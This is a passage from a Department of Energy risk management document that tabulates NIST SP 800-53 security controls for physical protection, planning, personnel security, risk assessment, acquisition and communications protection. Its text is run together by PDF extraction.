The organization restrictsphysical access to thefacility containing aninformation system thatprocesses classifiedinformation to authorizedpersonnel with appropriateclearances and accessauthorizations.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
207 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-3Physical Access
ControlX X X X X X X X X X X X Yes Yes P1
The organization: a)Enforces physical accessauthorizations for allphysical access points(including designatedentry/exit points) to thefacility where theinformation system resides(excluding those areaswithin the facility officiallydesignated as publiclyaccessible); b) Verifiesindividual accessauthorizations beforegranting access to thefacility; c) Controls entry tothe facility containing theinformation system usingphysical access devicesand/or guards; d) Controlsaccess to areas officiallydesignated as publiclyaccessible in accordancewith the organization’sassessment of risk; e)Secures keys, combinations,and other physical accessdevices; f) Inventoriesphysical access devices[Assignment: organization-defined frequency]; and g)Changes combinations andkeys [Assignment:organization-definedfrequency] and when keysare lost, combinations arecompromised, or individualsare transferred orterminated.
PE-3(1)Physical Access
ControlX X X Yes Yes P1
The organization enforcesphysical accessauthorizations to theinformation systemindependent of the physicalaccess controls for thefacility.
PE-3(2)Physical Access
ControlX X X Yes Yes P1
The organization performssecurity checks at thephysical boundary of thefacility or information systemfor unauthorized exfiltrationof information or informationsystem components.
PE-3(3)Physical Access
ControlX X X X X X Yes Yes P1
The organization guards,alarms, and monitors everyphysical access point to thefacility where theinformation system resides24 hours per day, 7 days perweek.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
208 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-3(4)Physical Access
ControlX X Yes Yes P1
The organization useslockable physical casings toprotect [Assignment:organization-definedinformation systemcomponents] fromunauthorized physicalaccess.
PE-3(6)Physical Access
ControlX Yes Yes P1
The organization employs apenetration testing processthat includes [Assignment:organization-definedfrequency], unannouncedattempts to bypass orcircumvent security controlsassociated with physicalaccess points to the facility.
PE-4Access Control For
TransmissionMedium
X X X X X X No No P1
The organization controlsphysical access toinformation systemdistribution andtransmission lines withinorganizational facilities.
PE-5Access Control For
Output DevicesX X X X X Yes Yes P1
The organization controlsphysical access toinformation system outputdevices to preventunauthorized individualsfrom obtaining the output.
PE-6Monitoring Physical
AccessX X X X X X X X X X X X Yes Yes P1
The organization: a)Monitors physical access tothe information system todetect and respond tophysical security incidents;b) Reviews physical accesslogs [Assignment:organization-definedfrequency]; and c)Coordinates results ofreviews and investigationswith the organization’sincident response capability.
PE-6(1)Monitoring Physical
AccessX X X X Yes Yes P1
The organization monitorsreal-time physical intrusionalarms and surveillanceequipment.
PE-6(2)Monitoring Physical
AccessX No No P1
The organization employsautomated mechanisms torecognize potentialintrusions and initiatedesignated responseactions.
PE-7 Visitor Control X X X X X X X X X Yes Yes P1
The organization controlsphysical access to theinformation system byauthenticating visitorsbefore authorizing access tothe facility where theinformation system residesother than areas designatedas publicly accessible.
PE-7(1) Visitor Control X X X X X X X X Yes Yes P1The organization escortsvisitors and monitors visitoractivity, when required.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
209 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-8 Access Records X X X X X X X X X Yes Yes P3
The organization: a)Maintains visitor accessrecords to the facility wherethe information systemresides (except for thoseareas within the facilityofficially designated aspublicly accessible); and b)Reviews visitor accessrecords [Assignment:organization-definedfrequency].
PE-8(1) Access Records X No No P3
The organization employsautomated mechanisms tofacilitate the maintenanceand review of accessrecords.
PE-8(2) Access Records X X Yes Yes P3
The organization maintainsa record of all physicalaccess, both visitor andauthorized individuals.
PE-9Power EquipmentAnd Power Cabling
X X X X X No No P1
The organization protectspower equipment and powercabling for the informationsystem from damage anddestruction.
PE-9(2)Power EquipmentAnd Power Cabling
X X No Yes P1
The organization employsautomatic voltage controlsfor [Assignment:organization-defined list ofcritical information systemcomponents].
PE-10 Emergency Shutoff X X X X X No No P1
The organization: a)Provides the capability ofshutting off power to theinformation system orindividual systemcomponents in emergencysituations; b) Placesemergency shutoff switchesor devices in [Assignment:organization-definedlocation by informationsystem or systemcomponent] to facilitate safeand easy access forpersonnel; and c) Protectsemergency power shutoffcapability from unauthorizedactivation.
PE-11 Emergency Power X X X X No No P1
The organization provides ashort-term uninterruptiblepower supply to facilitate anorderly shutdown of theinformation system in theevent of a primary powersource loss.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
210 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-11(1) Emergency Power X X No No P1
The organization provides along-term alternate powersupply for the informationsystem that is capable ofmaintaining minimallyrequired operationalcapability in the event of anextended loss of the primarypower source.
PE-11(2) Emergency Power X No Yes P1
The organization provides along-term alternate powersupply for the informationsystem that is self-containedand not reliant on externalpower generation.
PE-12 Emergency Lighting X X X X X X No No P1
The organization employsand maintains automaticemergency lighting for theinformation system thatactivates in the event of apower outage or disruptionand that covers emergencyexits and evacuation routeswithin the facility.
PE-12(1) Emergency Lighting X X No No P1
The organization providesemergency lighting for allareas within the facilitysupporting essentialmissions and businessfunctions.
PE-13 Fire Protection X X X X X X No No P1
The organization employsand maintains firesuppression and detectiondevices/systems for theinformation system that aresupported by anindependent energy source.
PE-13(1) Fire Protection X X X No No P1
The organization employsfire detectiondevices/systems for theinformation system thatactivate automatically andnotify the organization andemergency responders inthe event of a fire.
PE-13(2) Fire Protection X X X No No P1
The organization employsfire suppressiondevices/systems for theinformation system thatprovide automaticnotification of any activationto the organization andemergency responders.
PE-13(3) Fire Protection X X X No No P1
The organization employs anautomatic fire suppressioncapability for the informationsystem when the facility isnot staffed on a continuousbasis.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
211 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-13(4) Fire Protection X No Yes P1
The organization ensuresthat the facility undergoes[Assignment: organization-defined frequency] firemarshal inspections andpromptly resolves identifieddeficiencies.
PE-14Temperature AndHumidity Controls
X X X X X X No No P1
The organization: a)Maintains temperature andhumidity levels within thefacility where theinformation system residesat [Assignment:organization-definedacceptable levels]; and b)Monitors temperature andhumidity levels [Assignment:organization-definedfrequency].
PE-14(1)Temperature AndHumidity Controls
X X No Yes P1
The organization employsautomatic temperature andhumidity controls in thefacility to preventfluctuations potentiallyharmful to the informationsystem.
PE-14(2)Temperature AndHumidity Controls
X X No Yes P1
The organization employstemperature and humiditymonitoring that provides analarm or notification ofchanges potentially harmfulto personnel or equipment.
PE-15Water Damage
ProtectionX X X X X X No No P1
The organization protectsthe information system fromdamage resulting from waterleakage by providing mastershutoff valves that areaccessible, working properly,and known to key personnel.
PE-15(1)Water Damage
ProtectionX No No P1
The organization employsmechanisms that, withoutthe need for manualintervention, protect theinformation system fromwater damage in the eventof a water leak.
PE-16Delivery And
RemovalX X X X X X X X X No No P1
The organization authorizes,monitors, and controls[Assignment: organization-defined types of informationsystem components]entering and exiting thefacility and maintainsrecords of those items.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
212 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PE-17 Alternate Work Site X X X X X X X X No No P1
The organization: a) Employs[Assignment: organization-defined management,operational, and technicalinformation system securitycontrols] at alternate worksites; b) Assesses asfeasible, the effectiveness ofsecurity controls at alternatework sites; and c) Provides ameans for employees tocommunicate withinformation securitypersonnel in case of securityincidents or problems.
PE-18Location Of
Information SystemComponents
X X
The organization positionsinformation systemcomponents within thefacility to minimize potentialdamage from physical andenvironmental hazards andto minimize the opportunityfor unauthorized access.
PE-18(1)Location Of
Information SystemComponents
X
The organization plans thelocation or site of the facilitywhere the informationsystem resides with regardto physical andenvironmental hazards andfor existing facilities,considers the physical andenvironmental hazards in itsrisk mitigation strategy.
PE-19 Information Leakage X X X X Yes Yes PO
The organization protectsthe information system frominformation leakage due toelectromagnetic signalsemanations.
PE-19(1) Information Leakage X X X X Yes Yes PO
The organization ensuresthat information systemcomponents, associateddata communications, andnetworks are protected inaccordance with: (i) nationalemissions and TEMPESTpolicies and procedures;and (ii) the sensitivity of theinformation beingtransmitted.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
213 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PL-1Security Planning
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented securityplanning policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the security planningpolicy and associatedsecurity planning controls.
PL-2System Security
PlanX X X X X X X X X X X X Yes Yes P1
The organization: a)Develops a security plan forthe information system that:1) - Is consistent with theorganization’s enterprisearchitecture; 2) - Explicitlydefines the authorizationboundary for the system; 3) -Describes the operationalcontext of the informationsystem in terms of missionsand business processes; 4) -Provides the securitycategorization of theinformation system includingsupporting rationale; 5) -Describes the operationalenvironment for theinformation system; 6) -Describes relationships withor connections to otherinformation systems; 7)Provides an overview of thesecurity requirements forthe system; 8) - Describesthe security controls in placeor planned for meetingthose requirementsincluding a rationale for thetailoring andsupplementation decisions;and 9) - Is reviewed andapproved by the authorizingofficial or designatedrepresentative prior to planimplementation; b) Reviewsthe security plan for theinformation system[Assignment: organization-defined frequency]; and c)Updates the plan to addresschanges to the informationsystem/environment ofoperation or problemsidentified during planimplementation or securitycontrol assessments.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
214 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PL-2(1)System Security
PlanX X X X X X X X X Yes Yes P1
The organization: a)Develops a security Conceptof Operations (CONOPS) forthe information systemcontaining, at a minimum: (i)the purpose of the system;(ii) a description of thesystem architecture; (iii) thesecurity authorizationschedule; and (iv) thesecurity categorization andassociated factorsconsidered in determiningthe categorization; and b)Reviews and updates theCONOPS [Assignment:organization-definedfrequency].
PL-2(2)System Security
PlanX X X X X X X X X Yes Yes P1
The organization develops afunctional architecture forthe information system thatidentifies and maintains: a)External interfaces, theinformation beingexchanged across theinterfaces, and theprotection mechanismsassociated with eachinterface; b) User roles andthe access privilegesassigned to each role; c)Unique securityrequirements; d) Types ofinformation processed,stored, or transmitted by theinformation system and anyspecific protection needs inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andguidance; and e)Restoration priority ofinformation or informationsystem services.
PL-4 Rules Of Behavior X X X X X X X X X X X X Yes Yes P1
The organization: a)Establishes and makesreadily available to allinformation system users,the rules that describe theirresponsibilities andexpected behavior withregard to information andinformation system usage;and b) Receives signedacknowledgment from usersindicating that they haveread, understand, and agreeto abide by the rules ofbehavior, before authorizingaccess to information andthe information system.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
215 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PL-5Privacy Impact
AssessmentX X X X X X No No P1
The organization conducts aprivacy impact assessmenton the information system inaccordance with OMB policy.
PL-6Security-RelatedActivity Planning
X X X X X X X X X X X No No P3
The organization plans andcoordinates security-relatedactivities affecting theinformation system beforeconducting such activities inorder to reduce the impacton organizational operations(i.e., mission, functions,image, and reputation),organizational assets, andindividuals.
PS-1Personnel Security
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documentedpersonnel security policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the personnel securitypolicy and associatedpersonnel security controls.
PS-2Position
CategorizationX X X X X X X X X X X X Yes Yes P1
The organization: a) Assignsa risk designation to allpositions; b) Establishesscreening criteria forindividuals filling thosepositions; and c) Reviewsand revises position riskdesignations [Assignment:organization-definedfrequency].
PS-3 Personnel Screening X X X X X X X X X Yes Yes P1
The organization: a) Screensindividuals prior toauthorizing access to theinformation system; and b)Rescreens individualsaccording to [Assignment:organization-defined list ofconditions requiringrescreening and, where re-screening is so indicated,the frequency of suchrescreening].
PS-3(1) Personnel Screening X X X Yes Yes P1
The organization ensuresthat every user accessing aninformation systemprocessing, storing, ortransmitting classifiedinformation is cleared andindoctrinated to the highestclassification level of theinformation on the system.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
216 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PS-3(2) Personnel Screening X X X Yes Yes P1
The organization ensuresthat every user accessing aninformation systemprocessing, storing, ortransmitting types ofclassified information whichrequire formalindoctrination, is formallyindoctrinated for all of therelevant types of informationon the system.
PS-4Personnel
TerminationX X X X X X X X X X X X Yes Yes P2
The organization, upontermination of individualemployment: a) Terminatesinformation system access;b) Conducts exit interviews;c) Retrieves all security-related organizationalinformation system-relatedproperty; and d) Retainsaccess to organizationalinformation and informationsystems formerly controlledby terminated individual.
PS-5 Personnel Transfer X X X X X X X X X X X X Yes Yes P2
The organization reviewslogical and physical accessauthorizations toinformationsystems/facilities whenpersonnel are reassigned ortransferred to otherpositions within theorganization and initiates[Assignment: organization-defined transfer orreassignment actions]within [Assignment:organization-defined timeperiod following the formaltransfer action].
PS-6 Access Agreements X X X X X X X X X Yes Yes P3
The organization: a)Ensures that individualsrequiring access toorganizational informationand information systemssign appropriate accessagreements prior to beinggranted access; and b)Reviews/updates the accessagreements [Assignment:organization-definedfrequency].
PS-6(1) Access Agreements X X X X X X Yes Yes P3
The organization ensuresthat access to informationwith special protectionmeasures is granted only toindividuals who: a) Have avalid access authorizationthat is demonstrated byassigned official governmentduties; and b) Satisfyassociated personnelsecurity criteria.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
217 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
PS-6(2) Access Agreements X X X Yes Yes P3
The organization ensuresthat access to classifiedinformation with specialprotection measures isgranted only to individualswho: a) Have a valid accessauthorization that isdemonstrated by assignedofficial government duties;b) Satisfy associatedpersonnel security criteria;and c) Have read,understand, and signed anondisclosure agreement.
PS-7Third-Party
Personnel SecurityX X X X X X X X X Yes Yes P1
The organization: a)Establishes personnelsecurity requirementsincluding security roles andresponsibilities for third-party providers; b)Documents personnelsecurity requirements; andc) Monitors providercompliance.
PS-8 Personnel Sanctions X X X X X X X X X X X X Yes Yes P3
The organization employs aformal sanctions process forpersonnel failing to complywith established informationsecurity policies andprocedures.
RA-1Risk Assessment
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented riskassessment policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the risk assessmentpolicy and associated riskassessment controls.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
218 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
RA-2Security
CategorizationX X X X X X X X X X X X Yes Yes P1
The organization: a)Categorizes information andthe information system inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andguidance; b) Documents thesecurity categorizationresults (including supportingrationale) in the securityplan for the informationsystem; and c) Ensures thesecurity categorizationdecision is reviewed andapproved by the authorizingofficial or authorizing officialdesignated representative.
RA-3 Risk Assessment X X X X X X X X X X X X Yes Yes P1
The organization: a)Conducts an assessment ofrisk, including the likelihoodand magnitude of harm,from the unauthorizedaccess, use, disclosure,disruption, modification, ordestruction of theinformation system and theinformation it processes,stores, or transmits; b)Documents risk assessmentresults in [Selection: securityplan; risk assessmentreport; [Assignment:organization-defineddocument]]; c) Reviews riskassessment results[Assignment: organization-defined frequency]; and d)Updates the riskassessment [Assignment:organization-definedfrequency] or wheneverthere are significantchanges to the informationsystem or environment ofoperation (including theidentification of new threatsand vulnerabilities), or otherconditions that may impactthe security state of thesystem.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
219 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
RA-5Vulnerability
ScanningX X X X X X X X X X X X No No P1
The organization: a) Scansfor vulnerabilities in theinformation system andhosted applications[Assignment: organization-defined frequency and/orrandomly in accordancewith organization-definedprocess] and when newvulnerabilities potentiallyaffecting thesystem/applications areidentified and reported; b)Employs vulnerabilityscanning tools andtechniques that promoteinteroperability among toolsand automate parts of thevulnerability managementprocess by using standardsfor: 1) Enumeratingplatforms, software flaws,and improperconfigurations; 2)Formatting and makingtransparent, checklists andtest procedures; and 3)Measuring vulnerabilityimpact; c) Analyzesvulnerability scan reportsand results from securitycontrol assessments; d)Remediates legitimatevulnerabilities [Assignment:organization-definedresponse times] inaccordance with anorganizational assessmentof risk; and e) Sharesinformation obtained fromthe vulnerability scanningprocess and security controlassessments withdesignated personnelthroughout the organizationto help eliminate similarvulnerabilities in otherinformation systems (i.e.,systemic weaknesses ordeficiencies).
RA-5(1)Vulnerability
ScanningX X X X X X X X X X X No No P1
The organization employsvulnerability scanning toolsthat include the capability toreadily update the list ofinformation systemvulnerabilities scanned.
RA-5(2)Vulnerability
ScanningX X X X X X X X X X No No P1
The organization updatesthe list of informationsystem vulnerabilitiesscanned [Assignment:organization-definedfrequency] or when newvulnerabilities are identifiedand reported.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
220 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
RA-5(3)Vulnerability
ScanningX
The organization employsvulnerability scanningprocedures that candemonstrate the breadthand depth of coverage (i.e.,information systemcomponents scanned andvulnerabilities checked).
RA-5(4)Vulnerability
ScanningX X X X X X X X X X No No P1
The organization attempts todiscern what informationabout the informationsystem is discoverable byadversaries.
RA-5(5)Vulnerability
ScanningX X X X X X X X X X No No P1
The organization includesprivileged accessauthorization to[Assignment: organization-identified informationsystem components] forselected vulnerabilityscanning activities tofacilitate more thoroughscanning.
RA-5(7)Vulnerability
ScanningX X X X X X X X X X No No P1
The organization employsautomated mechanisms[Assignment: organization-defined frequency] to detectthe presence ofunauthorized software onorganizational informationsystems and notifydesignated organizationalofficials.
RA-5(9)Vulnerability
ScanningX No No P1
The organization employs anindependent penetrationagent or penetration teamto: a) Conduct a vulnerabilityanalysis on the informationsystem; and b) Performpenetration testing on theinformation system basedon the vulnerability analysisto determine theexploitability of identifiedvulnerabilities.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
221 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-1
System AndServices Acquisition
Policy AndProcedures
X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented systemand services acquisitionpolicy that includesinformation securityconsiderations and thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the system and servicesacquisition policy andassociated system andservices acquisitioncontrols.
SA-2Allocation OfResources
X X X X X X No No P1
The organization: a)Includes a determination ofinformation securityrequirements for theinformation system inmission/business processplanning; b) Determines,documents, and allocatesthe resources required toprotect the informationsystem as part of its capitalplanning and investmentcontrol process; and c)Establishes a discrete lineitem for information securityin organizationalprogramming and budgetingdocumentation.
SA-3 Life Cycle Support X X X X X X Yes Yes P1
The organization: a)Manages the informationsystem using a systemdevelopment life cyclemethodology that includesinformation securityconsiderations; b) Definesand documents informationsystem security roles andresponsibilities throughoutthe system development lifecycle; and c) Identifiesindividuals havinginformation system securityroles and responsibilities.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
222 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-4 Acquisitions X X X X X X No No P1
The organization includesthe following requirementsand/or specifications,explicitly or by reference, ininformation systemacquisition contracts basedon an assessment of riskand in accordance withapplicable federal laws,Executive Orders, directives,policies, regulations, andstandards: a) Securityfunctionalrequirements/specifications;b) Security-relateddocumentationrequirements; and c)Developmental andevaluation-relatedassurance requirements.
SA-4(1) Acquisitions X X X X No No P1
The organization requires inacquisition documents thatvendors/contractors provideinformation describing thefunctional properties of thesecurity controls to beemployed within theinformation system,information systemcomponents, or informationsystem services in sufficientdetail to permit analysis andtesting of the controls.
SA-4(2) Acquisitions X X No No P1
The organization requires inacquisition documents thatvendors/contractors provideinformation describing thedesign and implementationdetails of the securitycontrols to be employedwithin the informationsystem, information systemcomponents, or informationsystem services (includingfunctional interfaces amongcontrol components) insufficient detail to permitanalysis and testing of thecontrols.
SA-4(3) Acquisitions X
The organization requiressoftwarevendors/manufacturers todemonstrate that theirsoftware developmentprocesses employ state-of-the-practice software andsecurity engineeringmethods, quality controlprocesses, and validationtechniques to minimizeflawed or malformedsoftware.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
223 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-4(4) Acquisitions X X No No P1
The organization ensuresthat each informationsystem component acquiredis explicitly assigned to aninformation system, and thatthe owner of the systemacknowledges thisassignment.
SA-4(5) Acquisitions X No No P1
The organization requires inacquisition documents, thatinformation systemcomponents are delivered ina secure, documentedconfiguration, and that thesecure configuration is thedefault configuration for anysoftware reinstalls orupgrades.
SA-4(6) Acquisitions X X X No No P1
The organization: a) Employsonly government off-the-shelf (GOTS) or commercialoff-the-shelf (COTS)information assurance (IA)and IA-enabled informationtechnology products thatcomposes an NSA-approvedsolution to protect classifiedinformation when thenetworks used to transmitthe information are at alower classification levelthan the information beingtransmitted; and b) Ensuresthat these products havebeen evaluated and/orvalidated by the NSA or inaccordance with NSA-approved procedures.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
224 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-5Information System
DocumentationX X X X X X No No P2
The organization: a) Obtains,protects as required, andmakes available toauthorized personnel,administratordocumentation for theinformation system thatdescribes: 1) Secureconfiguration, installation,and operation of theinformation system; 2) -Effective use andmaintenance of securityfeatures/functions; and 3) -Known vulnerabilitiesregarding configuration anduse of administrative (i.e.,privileged) functions; and b)Obtains, protects asrequired, and makesavailable to authorizedpersonnel, userdocumentation for theinformation system thatdescribes: 1) - User-accessible securityfeatures/functions and howto effectively use thosesecurity features/functions;2) - Methods for userinteraction with theinformation system, whichenables individuals to usethe system in a more securemanner; and 3) - Userresponsibilities inmaintaining the security ofthe information andinformation system; and c)Documents attempts toobtain information systemdocumentation when suchdocumentation is eitherunavailable or nonexistent.
SA-5(1)Information System
DocumentationX X X X X No No P2
The organization obtains,protects as required, andmakes available toauthorized personnel,vendor/manufacturerdocumentation thatdescribes the functionalproperties of the securitycontrols employed within theinformation system withsufficient detail to permitanalysis and testing.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
225 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-5(2)Information System
DocumentationX X X X No No P2
The organization obtains,protects as required, andmakes available toauthorized personnel,vendor/manufacturerdocumentation thatdescribes the security-relevant external interfacesto the information systemwith sufficient detail topermit analysis and testing.
SA-5(3)Information System
DocumentationX X X X No No P2
The organization obtains,protects as required, andmakes available toauthorized personnel,vendor/manufacturerdocumentation thatdescribes the high-leveldesign of the informationsystem in terms ofsubsystems andimplementation details ofthe security controlsemployed within the systemwith sufficient detail topermit analysis and testing.
SA-5(4)Information System
DocumentationX No No P2
The organization obtains,protects as required, andmakes available toauthorized personnel,vendor/manufacturerdocumentation thatdescribes the low-leveldesign of the informationsystem in terms of modulesand implementation detailsof the security controlsemployed within the systemwith sufficient detail topermit analysis and testing.
SA-6Software Usage
RestrictionsX X X X X X X X X No No P1
The organization: a) Usessoftware and associateddocumentation inaccordance with contractagreements and copyrightlaws; b) Employs trackingsystems for software andassociated documentationprotected by quantitylicenses to control copyingand distribution; and c)Controls and documents theuse of peer-to-peer filesharing technology toensure that this capability isnot used for theunauthorized distribution,display, performance, orreproduction of copyrightedwork.
SA-7User Installed
SoftwareX X X X X X Yes Yes P1
The organization enforcesexplicit rules governing theinstallation of software byusers.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
226 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-8Security Engineering
PrinciplesX X X X X Yes Yes P1
The organization appliesinformation system securityengineering principles in thespecification, design,development,implementation, andmodification of theinformation system.
SA-9External Information
System ServicesX X X X X X No No P1
The organization: a)Requires that providers ofexternal information systemservices comply withorganizational informationsecurity requirements andemploy appropriate securitycontrols in accordance withapplicable federal laws,Executive Orders, directives,policies, regulations,standards, and guidance; b)Defines and documentsgovernment oversight anduser roles andresponsibilities with regardto external informationsystem services; and c)Monitors security controlcompliance by externalservice providers.
SA-9(1)External Information
System ServicesX X X No No P1
The organization: a)Conducts an organizationalassessment of risk prior tothe acquisition oroutsourcing of dedicatedinformation securityservices; and b) Ensuresthat the acquisition oroutsourcing of dedicatedinformation security servicesis approved by [Assignment:organization-defined seniororganizational official].
SA-10Developer
ConfigurationManagement
X X X X X No Yes P1
The organization requiresthat information systemdevelopers/integrators: a)Perform configurationmanagement duringinformation system design,development,implementation, andoperation; b) Manage andcontrol changes to theinformation system; c)Implement onlyorganization-approvedchanges; d) Documentapproved changes to theinformation system; and e)Track security flaws and flawresolution.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
227 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SA-10(1)Developer
ConfigurationManagement
X X X No Yes P1
The organization requiresthat information systemdevelopers/integratorsprovide an integrity check ofsoftware to facilitateorganizational verification ofsoftware integrity afterdelivery
SA-11Developer Security
TestingX X X X X No Yes P2
The organization requiresthat information systemdevelopers/integrators, inconsultation with associatedsecurity personnel (includingsecurity engineers): a)Create and implement asecurity test and evaluationplan; b) Implement averifiable flaw remediationprocess to correctweaknesses anddeficiencies identified duringthe security testing andevaluation process; and c)Document the results of thesecurity testing/evaluationand flaw remediationprocesses.
SA-11(1)Developer Security
TestingX No Yes P2
The organization requiresthat information systemdevelopers/integratorsemploy code analysis toolsto examine software forcommon flaws anddocument the results of theanalysis.
SA-11(2)Developer Security
TestingX No Yes P2
The organization requiresthat information systemdevelopers/integratorsperform a vulnerabilityanalysis to documentvulnerabilities, exploitationpotential, and riskmitigations.
SA-12Supply Chain
ProtectionX X X X X X X X X X Yes Yes P1
The organization protectsagainst supply chain threatsby employing: [Assignment:organization-defined list ofmeasures to protect againstsupply chain threats] as partof a comprehensive,defense-in-breadthinformation securitystrategy.
SA-12(2)Supply Chain
ProtectionX X X X X X X X X Yes Yes P1
The organization conducts adue diligence review ofsuppliers prior to enteringinto contractual agreementsto acquire informationsystem hardware, software,firmware, or services.
SA-13 Trustworthiness X
The organization requiresthat the information systemmeets [Assignment:organization-defined level oftrustworthiness].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
228 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-1
System AndCommunicationsProtection PolicyAnd Procedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented systemand communicationsprotection policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the system andcommunications protectionpolicy and associatedsystem and communicationsprotection controls.
SC-2ApplicationPartitioning
X X X X X X X X Yes Yes P1
The information systemseparates user functionality(including user interfaceservices) from informationsystem managementfunctionality.
SC-2(1)ApplicationPartitioning
X X X X X X
The information systemprevents the presentation ofinformation systemmanagement-relatedfunctionality at an interfacefor general (i.e., non-privileged) users.
SC-3Security Function
IsolationX X Yes Yes P1
The information systemisolates security functionsfrom nonsecurity functions.
SC-4Information In
Shared ResourcesX X X X X No No P1
The information systemprevents unauthorized andunintended informationtransfer via shared systemresources.
SC-5Denial Of Service
ProtectionX X X X X X No Yes P1
The information systemprotects against or limits theeffects of the following typesof denial of service attacks:[Assignment: organization-defined list of types of denialof service attacks orreference to source forcurrent list].
SC-5(1)Denial Of Service
ProtectionX X X No Yes P1
The information systemrestricts the ability of usersto launch denial of serviceattacks against otherinformation systems ornetworks.
SC-5(2)Denial Of Service
ProtectionX X No Yes P1
The information systemmanages excess capacity,bandwidth, or otherredundancy to limit theeffects of informationflooding types of denial ofservice attacks.
